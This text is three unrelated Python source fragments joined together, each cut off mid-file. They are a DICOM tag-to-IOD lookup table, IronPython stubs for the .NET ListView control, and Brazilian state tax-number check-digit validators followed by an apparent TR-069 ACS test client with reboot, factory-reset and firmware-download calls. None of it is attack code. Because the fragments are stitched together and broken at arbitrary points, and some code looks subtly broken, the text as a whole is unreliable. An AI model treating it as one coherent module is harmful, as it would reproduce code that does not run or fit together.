None: ['Image'],
},
# TextString
0x20300020L: {
'BASIC ANNOTATION BOX IOD': ['Basic Annotation Box'],
None: ['Basic Annotation Box'],
},
# ImagePathFilterTypeStackCodeSequence
0x00220018L: {
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
None: ['Image'],
},
# CorrectedLocalizedDeviationFromNormal
0x00240079L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# PerformedProcessingApplicationsCodeSequence
0x00404007L: {
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
None: ['General Purpose Performed Procedure Step'],
},
# EstimatedDoseSaving
0x00189324L: {
'CT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ScanLength
0x00181302L: {
'NM IMAGE IOD': ['Image'],
None: ['Image'],
},
# TimeOfSecondaryCapture
0x00181014L: {
'SC IMAGE IOD': ['Image'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Image'],
None: ['Image'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Image'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Image'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Image'],
},
# DeviationIndex
0x00181413L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
'CR IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
},
# ProcedureTypeCodeSequence
0x00760020L: {
'IMPLANT ASSEMBLY TEMPLATE IOD': ['Implant Assembly'],
None: ['Implant Assembly'],
},
# ObservationDateTime
0x0040A032L: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
| |
its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def Sort(self):
"""
Sort(self: ListView)
Sorts the items of the list view.
"""
pass
def ToString(self):
"""
ToString(self: ListView) -> str
Returns a string representation of the System.Windows.Forms.ListView control.
Returns: A string that states the control type,the count of items in the System.Windows.Forms.ListView
control,and the type of the first item in the System.Windows.Forms.ListView,if the count is
not 0.
"""
pass
def UpdateBounds(self,*args):
"""
UpdateBounds(self: Control,x: int,y: int,width: int,height: int,clientWidth: int,clientHeight: int)
Updates the bounds of the control with the specified size,location,and client size.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
clientWidth: The client System.Drawing.Size.Width of the control.
clientHeight: The client System.Drawing.Size.Height of the control.
UpdateBounds(self: Control,x: int,y: int,width: int,height: int)
Updates the bounds of the control with the specified size and location.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
UpdateBounds(self: Control)
Updates the bounds of the control with the current size and location.
"""
pass
def UpdateExtendedStyles(self,*args):
"""
UpdateExtendedStyles(self: ListView)
Updates the extended styles applied to the list view control.
"""
pass
def UpdateStyles(self,*args):
"""
UpdateStyles(self: Control)
Forces the assigned styles to be reapplied to the control.
"""
pass
def UpdateZOrder(self,*args):
"""
UpdateZOrder(self: Control)
Updates the control in its parent's z-order.
"""
pass
def WndProc(self,*args):
"""
WndProc(self: ListView,m: Message) -> Message
Overrides System.Windows.Forms.Control.WndProc(System.Windows.Forms.Message@).
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def __enter__(self,*args):
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self,*args):
"""
__exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __str__(self,*args):
pass
Activation=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the type of action the user must take to activate an item.
Get: Activation(self: ListView) -> ItemActivation
Set: Activation(self: ListView)=value
"""
Alignment=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the alignment of items in the control.
Get: Alignment(self: ListView) -> ListViewAlignment
Set: Alignment(self: ListView)=value
"""
AllowColumnReorder=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the user can drag column headers to reorder columns in the control.
Get: AllowColumnReorder(self: ListView) -> bool
Set: AllowColumnReorder(self: ListView)=value
"""
AutoArrange=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets whether icons are automatically kept arranged.
Get: AutoArrange(self: ListView) -> bool
Set: AutoArrange(self: ListView)=value
"""
BackColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background color.
Get: BackColor(self: ListView) -> Color
Set: BackColor(self: ListView)=value
"""
BackgroundImageLayout=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets an System.Windows.Forms.ImageLayout value.
Get: BackgroundImageLayout(self: ListView) -> ImageLayout
Set: BackgroundImageLayout(self: ListView)=value
"""
BackgroundImageTiled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the background image of the System.Windows.Forms.ListView should be tiled.
Get: BackgroundImageTiled(self: ListView) -> bool
Set: BackgroundImageTiled(self: ListView)=value
"""
BorderStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the border style of the control.
Get: BorderStyle(self: ListView) -> BorderStyle
Set: BorderStyle(self: ListView)=value
"""
CanEnableIme=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value,to enable IME support.
"""
CanRaiseEvents=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Determines if events can be raised on the control.
"""
CheckBoxes=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether a check box appears next to each item in the control.
Get: CheckBoxes(self: ListView) -> bool
Set: CheckBoxes(self: ListView)=value
"""
CheckedIndices=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the indexes of the currently checked items in the control.
Get: CheckedIndices(self: ListView) -> CheckedIndexCollection
"""
CheckedItems=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the currently checked items in the control.
Get: CheckedItems(self: ListView) -> CheckedListViewItemCollection
"""
Columns=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of all column headers that appear in the control.
Get: Columns(self: ListView) -> ColumnHeaderCollection
"""
CreateParams=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""This property is not relevant for this class.
"""
DefaultCursor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the space,in pixels,that is specified by default between controls.
"""
DefaultMaximumSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the length and height,in pixels,that is specified as the default maximum size of a control.
"""
DefaultMinimumSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the length and height,in pixels,that is specified as the default minimum size of a control.
"""
DefaultPadding=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the internal spacing,in pixels,of the contents of a control.
"""
DefaultSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
DesignMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered=property(lambda self: object(),lambda self,v: None,lambda self: None)
Events=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FocusedItem=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the item in the control that currently has focus.
Get: FocusedItem(self: ListView) -> ListViewItem
Set: FocusedItem(self: ListView)=value
"""
FontHeight=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the height of the font of the control.
"""
ForeColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the foreground color.
Get: ForeColor(self: ListView) -> Color
Set: ForeColor(self: ListView)=value
"""
FullRowSelect=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether clicking an item selects all its subitems.
Get: FullRowSelect(self: ListView) -> bool
Set: FullRowSelect(self: ListView)=value
"""
GridLines=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether grid lines appear between the rows and columns containing the items and subitems in the control.
Get: GridLines(self: ListView) -> bool
Set: GridLines(self: ListView)=value
"""
Groups=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of System.Windows.Forms.ListViewGroup objects assigned to the control.
Get: Groups(self: ListView) -> ListViewGroupCollection
"""
HeaderStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the column header style.
Get: HeaderStyle(self: ListView) -> ColumnHeaderStyle
Set: HeaderStyle(self: ListView)=value
"""
HideSelection=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the selected item in the control remains highlighted when the control loses focus.
Get: HideSelection(self: ListView) -> bool
Set: HideSelection(self: ListView)=value
"""
HotTracking=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the text of an item or subitem has the appearance of a hyperlink when the mouse pointer passes over it.
Get: HotTracking(self: ListView) -> bool
Set: HotTracking(self: ListView)=value
"""
HoverSelection=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether an item is automatically selected when the mouse pointer remains over the item for a few seconds.
Get: HoverSelection(self: ListView) -> bool
Set: HoverSelection(self: ListView)=value
"""
ImeModeBase=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the IME mode of a control.
"""
InsertionMark=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object used to indicate the expected drop location when an item is dragged within a System.Windows.Forms.ListView control.
Get: InsertionMark(self: ListView) -> ListViewInsertionMark
"""
Items=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a collection containing all items in the control.
Get: Items(self: ListView) -> ListViewItemCollection
"""
LabelEdit=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the user can edit the labels of items in the control.
Get: LabelEdit(self: ListView) -> bool
Set: LabelEdit(self: ListView)=value
"""
LabelWrap=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether item labels wrap when items are displayed in the control as icons.
Get: LabelWrap(self: ListView) -> bool
Set: LabelWrap(self: ListView)=value
"""
LargeImageList=property(lambda self: object(),lambda self,v: None,lambda self: | |
# coding=utf-8
# Copyright (C) 2013 <NAME> - Akretion
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
import re
PARAMETERS = {
'ac': {'tam': 13, 'val_tam': 11, 'starts_with': '01'},
'al': {'tam': 9, 'starts_with': '24'},
'am': {'tam': 9},
'ce': {'tam': 9},
'df': {'tam': 13, 'val_tam': 11, 'starts_with': '07'},
'es': {'tam': 9},
'ma': {'tam': 9, 'starts_with': '12'},
'mt': {'tam': 11, 'prod': [3, 2, 9, 8, 7, 6, 5, 4, 3, 2]},
'ms': {'tam': 9, 'starts_with': '28'},
'pa': {'tam': 9, 'starts_with': '15'},
'pb': {'tam': 9},
'pr': {'tam': 10, 'val_tam': 8, 'prod': [3, 2, 7, 6, 5, 4, 3, 2]},
'pi': {'tam': 9},
'rj': {'tam': 8, 'prod': [2, 7, 6, 5, 4, 3, 2]},
'rn': {'tam': 10, 'val_tam': 9, 'prod': [10, 9, 8, 7, 6, 5, 4, 3, 2]},
'rs': {'tam': 10},
'rr': {'tam': 9, 'starts_with': '24', 'prod': [1, 2, 3, 4, 5, 6, 7, 8],
'div': 9},
'sc': {'tam': 9},
'se': {'tam': 9},
'to': {'tam': 9, 'prod': [9, 8, 7, 6, 5, 4, 3, 2]}
}
def validar(uf, inscr_est):
result = True
try:
validar_by_uf = globals()['validar_%s' % uf]
if not validar_by_uf(inscr_est):
result = False
except KeyError:
if not validar_param(uf, inscr_est):
result = False
return result
def validar_param(uf, inscr_est):
if uf not in PARAMETERS:
return True
tam = PARAMETERS[uf].get('tam', 0)
inscr_est = inscr_est.strip().rjust(int(tam), '0')
inscr_est = re.sub('[^0-9]', '', inscr_est)
val_tam = PARAMETERS[uf].get('val_tam', tam - 1)
if isinstance(tam, list):
i = tam.find(len(inscr_est))
if i == -1:
return False
else:
val_tam = val_tam[i]
else:
if len(inscr_est) != tam:
return False
sw = PARAMETERS[uf].get('starts_with', '')
if not inscr_est.startswith(sw):
return False
inscr_est_ints = [int(c) for c in inscr_est]
nova_ie = inscr_est_ints[:val_tam]
prod = PARAMETERS[uf].get('prod', [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2])
prod = prod[-val_tam:]
while len(nova_ie) < tam:
r = sum([x * y for (x, y) in zip(nova_ie, prod)])\
% PARAMETERS[uf].get('div', 11)
if r > 1:
f = 11 - r
else:
f = 0
if uf not in 'rr':
nova_ie.append(f)
else:
nova_ie.append(r)
prod.insert(0, prod[0] + 1)
# Se o número gerado coincidir com o número original, é válido
return nova_ie == inscr_est_ints
def validar_ap(inscr_est):
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição estadual
if len(inscr_est) != 9:
return False
# verificando os dois primeiros dígitos
if not inscr_est.startswith('03'):
return False
# Pega apenas os 8 primeiros dígitos da inscrição estadual e
# define os valores de 'p' e 'd'
inscr_est_int = int(inscr_est[:8])
if inscr_est_int <= 3017000:
inscr_est_p = 5
inscr_est_d = 0
elif inscr_est_int <= 3019022:
inscr_est_p = 9
inscr_est_d = 1
else:
inscr_est_p = 0
inscr_est_d = 0
# Pega apenas os 8 primeiros dígitos da inscrição estadual e
# gera o dígito verificador
inscr_est = list(map(int, inscr_est))
nova_ie = inscr_est[:8]
prod = [9, 8, 7, 6, 5, 4, 3, 2]
r = (inscr_est_p + sum([x * y for (x, y) in zip(nova_ie, prod)])) % 11
if r > 1:
f = 11 - r
elif r == 1:
f = 0
else:
f = inscr_est_d
nova_ie.append(f)
return nova_ie == inscr_est
def validar_ba(inscr_est):
inscr_est = re.sub('[^0-9]', '', inscr_est)
inscr_est = list(map(int, inscr_est))
# verificando o tamanho da inscrição estadual
if len(inscr_est) == 8:
tam = 8
val_tam = 6
test_digit = 0
elif len(inscr_est) == 9:
tam = 9
val_tam = 7
test_digit = 1
else:
return False
nova_ie = inscr_est[:val_tam]
prod = [8, 7, 6, 5, 4, 3, 2][-val_tam:]
if inscr_est[test_digit] in [0, 1, 2, 3, 4, 5, 8]:
modulo = 10
else:
modulo = 11
while len(nova_ie) < tam:
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % modulo
if r > 0:
f = modulo - r
else:
f = 0
if f >= 10 and modulo == 11:
f = 0
if len(nova_ie) == val_tam:
nova_ie.append(f)
else:
nova_ie.insert(val_tam, f)
prod.insert(0, prod[0] + 1)
return nova_ie == inscr_est
def validar_go(inscr_est):
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição estadual
if len(inscr_est) != 9:
return False
# verificando os dois primeiros dígitos
if not inscr_est[:2] in ['10', '11', '15']:
return False
# Pega apenas os 8 primeiros dígitos da inscrição estadual e
# define os valores de 'p' e 'd'
inscr_est_int = int(inscr_est[:8])
if inscr_est_int >= 10103105 and inscr_est_int <= 10119997:
inscr_est_d = 1
else:
inscr_est_d = 0
# Pega apenas os 8 primeiros dígitos da inscrição estadual e
# gera o dígito verificador
inscr_est = list(map(int, inscr_est))
nova_ie = inscr_est[:8]
prod = [9, 8, 7, 6, 5, 4, 3, 2]
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
if r > 1:
f = 11 - r
elif r == 1:
f = inscr_est_d
else:
f = 0
nova_ie.append(f)
return nova_ie == inscr_est
def validar_mg(inscr_est):
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição estadual
if len(inscr_est) != 13:
return False
# Pega apenas os 11 primeiros dígitos da inscrição estadual e
# gera os dígitos verificadores
inscr_est = list(map(int, inscr_est))
nova_ie = inscr_est[:11]
nova_ie_aux = list(nova_ie)
nova_ie_aux.insert(3, 0)
prod = [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2]
r = str([x * y for (x, y) in zip(nova_ie_aux, prod)])
r = re.sub('[^0-9]', '', r)
r = list(map(int, r))
r = sum(r)
r2 = (r // 10 + 1) * 10
r = r2 - r
if r >= 10:
r = 0
nova_ie.append(r)
prod = [3, 2, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2]
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
if r > 1:
f = 11 - r
else:
f = 0
nova_ie.append(f)
return nova_ie == inscr_est
def validar_pe(inscr_est):
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição estadual
if (len(inscr_est) != 9) and (len(inscr_est) != 14):
return False
inscr_est = list(map(int, inscr_est))
# verificando o tamanho da inscrição estadual
if len(inscr_est) == 9:
# Pega apenas os 7 primeiros dígitos da inscrição estadual e
# gera os dígitos verificadores
inscr_est = list(map(int, inscr_est))
nova_ie = inscr_est[:7]
prod = [8, 7, 6, 5, 4, 3, 2]
while len(nova_ie) < 9:
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
if r > 1:
f = 11 - r
else:
f = 0
nova_ie.append(f)
prod.insert(0, 9)
elif len(inscr_est) == 14:
# Pega apenas os 13 primeiros dígitos da inscrição estadual e
# gera o dígito verificador
inscr_est = list(map(int, inscr_est))
nova_ie = inscr_est[:13]
prod = [5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2]
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
f = 11 - r
if f > 10:
f = f - 10
nova_ie.append(f)
return nova_ie == inscr_est
def validar_ro(inscr_est):
def gera_digito_ro(nova_ie, prod):
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
f = 11 - r
if f > 9:
f = f - 10
return f
inscr_est = re.sub('[^0-9]', '', inscr_est)
inscr_est = list(map(int, inscr_est))
# verificando o tamanho da inscrição estadual
if len(inscr_est) == 9:
# Despreza-se os 3 primeiros dígitos, pega apenas os 8 primeiros
# dígitos da inscrição estadual e gera o dígito verificador
nova_ie = inscr_est[3:8]
prod = [6, 5, 4, 3, 2]
f = gera_digito_ro(nova_ie, prod)
nova_ie.append(f)
nova_ie = inscr_est[0:3] + nova_ie
elif len(inscr_est) == 14:
# Pega apenas os 13 primeiros dígitos da inscrição estadual e
# gera o dígito verificador
nova_ie = inscr_est[:13]
prod = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]
f = gera_digito_ro(nova_ie, prod)
nova_ie.append(f)
else:
return False
return nova_ie == inscr_est
def validar_sp(inscr_est):
def gera_digito_sp(nova_ie, prod):
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
if r < 10:
return r
elif r == 10:
return 0
else:
return 1
# Industriais e comerciais
if inscr_est[0] != 'P':
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição | |
string
:returns: list of dictionary with key, value, type indicating the DelObject
:rtype: string
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="DO")
# get raw soap response
with self.client.settings(raw_response=True):
response = self.client.service.DeleteObject(p, cmd, cpe_id)
return AxirosACS._parse_soap_response(response)
def Read_Log_Message(self, cpeid, wait=8):
"""Read ACS log messages.
:param cpeid: the serial number of the modem through which ACS communication happens.
:type cpeid: string
:param wait: the number of tries to be done if we are not getting proper ACS response, defaults to 8
:type wait: integer, optional
:returns: ticket response on ACS(Log message)
:rtype: dictionary
"""
CommandOptionsTypeStruct_type = self.client.get_type(
"ns0:CommandOptionsForCPELogStruct")
CommandOptionsTypeStruct_data = CommandOptionsTypeStruct_type()
CPEIdentifierClassStruct_type = self.client.get_type(
"ns0:CPEIdentifierClassStruct")
CPEIdentifierClassStruct_data = CPEIdentifierClassStruct_type(
cpeid=cpeid)
# get raw soap response (parsing error with zeep)
with self.client.settings(raw_response=True):
response = self.client.service.GetLogMessagesOfCPE(
CommandOptionsTypeStruct_data, CPEIdentifierClassStruct_data)
for _ in range(wait):
time.sleep(1)
root = ElementTree.fromstring(response.content)
for value in root.iter("code"):
break
if value.text != "200":
continue
dict_value1 = {}
num = 1
for key, value in zip(root.iter("ts"), root.iter("message")):
dict_value = {}
dict_value["time"] = key.text
dict_value["msg"] = value.text
dict_value1["log_msg" + str(num)] = dict_value
num += 1
return dict_value1
return None
def Del_Log_Message(self, cpeid, wait=8):
"""Delete ACS log messages.
:param cpeid: the serial number of the modem through which ACS communication happens.
:type cpeid: string
:param wait: the number of tries to be done if we are not getting proper ACS response, defaults to 8
:type wait: integer, optional
:returns: True or None
:rtype: Boolean
"""
CPEIdentifierClassStruct_type = self.client.get_type(
"ns0:CPEIdentifierClassStruct")
CPEIdentifierClassStruct_data = CPEIdentifierClassStruct_type(
cpeid=cpeid)
# get raw soap response (parsing error with zeep)
with self.client.settings(raw_response=True):
response = self.client.service.DeleteLogMessagesOfCPE(
CPEIdentifierClassStruct_data)
for _ in range(wait):
time.sleep(1)
root = ElementTree.fromstring(response.content)
for value in root.iter("code"):
break
if value.text == "200":
return True
else:
continue
return None
@tcp_dump
def GPV(self, param):
"""Get value from CM by ACS for a single given parameter key path synchronously.
:param param: path to the key that assigned value will be retrieved
:return: value as a dictionary
"""
# TO DO: ideally this should come off the environment helper
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="GPV")
val = 0
while val <= 1:
try:
with self.client.settings(raw_response=True):
response = self.client.service.GetParameterValues(
p, cmd, cpe_id)
return AxirosACS._parse_soap_response(response)
except HTTPError as e:
if "507" not in str(e):
raise (e)
else:
# adding 10 sec timeout
warnings.warn(
"Ten seconds of timeout is added to compensate DOS attack."
)
self.expect(pexpect.TIMEOUT, timeout=10)
if val == 1:
raise (e)
val += 1
@tcp_dump
def SPV(self, param_value):
"""Modify the value of one or more CPE Parameters.
It can take a single k,v pair or a list of k,v pairs.
:param param_value: dictionary that contains the path to the key and
the value to be set. E.g. {'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}
:return: status of the SPV as int (0/1)
:raises: TR069ResponseError if the status is not (0/1)
"""
# TO DO: ideally this should come off the environment helper
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param_value,
action="SPV")
val = 0
while val <= 1:
try:
with self.client.settings(raw_response=True):
response = self.client.service.SetParameterValues(
p, cmd, cpe_id)
result = AxirosACS._parse_soap_response(response)
break
except HTTPError as e:
if "507" not in str(e):
raise (e)
else:
# adding 10 sec timeout
warnings.warn(
"Ten seconds of timeout is added to compensate DOS attack."
)
self.expect(pexpect.TIMEOUT, timeout=10)
if val == 1:
raise (e)
val += 1
status = int(result[0]["value"])
if status not in [0, 1]:
raise TR069ResponseError("SPV Invalid status: " + str(status))
return status
@tcp_dump
def GPN(self, param, next_level):
"""This method is used to discover the Parameters accessible on a particular CPE
:param param: parameter to be discovered
:type param: string
:next_level: displays the next level children of the object if marked true
:type next_level: boolean
:return: value as a dictionary
"""
# TO DO: ideally this should come off the environment helper
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="GPN",
next_level=next_level)
with self.client.settings(raw_response=True):
response = self.client.service.GetParameterNames(p, cmd, cpe_id)
return AxirosACS._parse_soap_response(response)
@tcp_dump
def FactoryReset(self):
"""Execute FactoryReset RPC.
Returns true if FactoryReset request is initiated.
Note: This method only informs if the FactoryReset request initiated or not.
The wait for the Reeboot of the device has to be handled in the test.
:return: returns factory reset response
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
CmdOptTypeStruct_data = self._get_cmd_data(Sync=True, Lifetime=20)
CPEIdClassStruct_data = self._get_class_data(cpeid=self.cpeid)
with self.client.settings(raw_response=True):
response = self.client.service.FactoryReset(
CommandOptions=CmdOptTypeStruct_data,
CPEIdentifier=CPEIdClassStruct_data,
)
return AxirosACS._parse_soap_response(response)
def connectivity_check(self, cpeid):
"""Check the connectivity between the ACS and the DUT by\
requesting the DUT to perform a schedule inform.
NOTE: The scope of this method is to verify that the ACS and DUT can
communicate with eachother!
:param cpeid: the id to use for the ping
:param type: string
:return: True for a successful ScheduleInform, False otherwise
"""
old_cpeid = self.cpeid
self.cpeid = cpeid
r = True
try:
self.ScheduleInform(DelaySeconds=1)
except Exception as e:
# on ANY exception assume ScheduleInform failed-> comms failed
print(e)
print(f"connectivity_check failed for {cpeid}")
r = False
self.cpeid = old_cpeid
return r
@tcp_dump
def ScheduleInform(self, CommandKey="Test", DelaySeconds=20):
"""Execute ScheduleInform RPC
:param commandKey: the string paramenter passed to scheduleInform
:param type: string
:param DelaySecond: delay of seconds in integer
:param type: integer
:return: returns ScheduleInform response
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
param = [CommandKey, DelaySeconds]
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="SI")
with self.client.settings(raw_response=True):
response = self.client.service.ScheduleInform(CommandOptions=cmd,
CPEIdentifier=cpe_id,
Parameters=p)
return AxirosACS._parse_soap_response(response)
@tcp_dump
def Reboot(self, CommandKey="Reboot Test"):
"""Execute Reboot.
Returns true if Reboot request is initiated.
:return: returns reboot RPC response
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
CommandKey,
action="REBOOT")
with self.client.settings(raw_response=True):
response = self.client.service.Reboot(CommandOptions=cmd,
CPEIdentifier=cpe_id,
Parameters=p)
return AxirosACS._parse_soap_response(response)
@tcp_dump
def GetRPCMethods(self):
"""Execute GetRPCMethods RPC.
:return: returns GetRPCMethods response of supported functions
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
CmdOptTypeStruct_data = self._get_cmd_data(Sync=True, Lifetime=20)
CPEIdClassStruct_data = self._get_class_data(cpeid=self.cpeid)
with self.client.settings(raw_response=True):
response = self.client.service.GetRPCMethods(
CommandOptions=CmdOptTypeStruct_data,
CPEIdentifier=CPEIdClassStruct_data,
)
return AxirosACS._parse_soap_response(response)
@tcp_dump
def Download(
self,
URL,
FileType="1 Firmware Upgrade Image",
TargetFileName="",
FileSize=200,
Username="",
Password="",
CommandKey="",
DelaySeconds=10,
SuccessURL="",
FailureURL="",
):
"""Execute Download RPC.
:param URL: URL to download file
:param type: string
:param FileType: the string paramenter from following 6 values only
["1 Firmware Upgrade Image", "2 Web Content",
"3 Vendor Configuration File", "4 Tone File",
"5 Ringer File", "6 Stored Firmware Image" ]
default="3 Vendor Configuration File"
:param type: string
:param TargetFileName: TargetFileName to download through RPC
:param type: string
:param FileSize: the size of file to download in bytes
:param type: integer
:param Username: User to authenticate with file Server. Default=""
:param type: string
:param Password: Password to authenticate with file Server. Default=""
:param type: string
:param CommandKey: the string paramenter passed in Download API
:param type: string
:param DelaySeconds: delay of seconds in integer
:param type: integer
:param SuccessURL: URL to access in case of Download API execution succeeded
:param type: string
:param FailureURL: URL to access in case of Download API execution Failed
:param type: string
:return: returns Download response
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
param = [
CommandKey,
DelaySeconds,
FailureURL,
FileSize,
FileType,
Password,
SuccessURL,
TargetFileName,
URL,
Username,
]
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="DOWNLOAD")
with self.client.settings(raw_response=True):
response = self.client.service.Download(CommandOptions=cmd,
CPEIdentifier=cpe_id,
Parameters=p)
return AxirosACS._parse_soap_response(response)
if __name__ == "__main__":
from pprint import pprint
import sys
"""Good values to test:
Device.DeviceInfo.ModelNumber
Device.DeviceInfo.SoftwareVersion
Device.DeviceInfo.Processor
NOTE: big queries may timeout
To use from cmdline change:
from . import base_acs
to:
from boardfarm.devices import base_acs
some cmd line samples (user/passwd from json serial no from ACS gui):
# this must work
python3 ./axiros_acs.py ip:port user passwd serialno GVP "'Device.DeviceInfo.ModelNumber'"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serailno GVP "'Device.DeviceInfo.ModelNumber1'"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serialno SVP "{'Device.DeviceInfo.ModelNumber':'mik'}"
# this should work
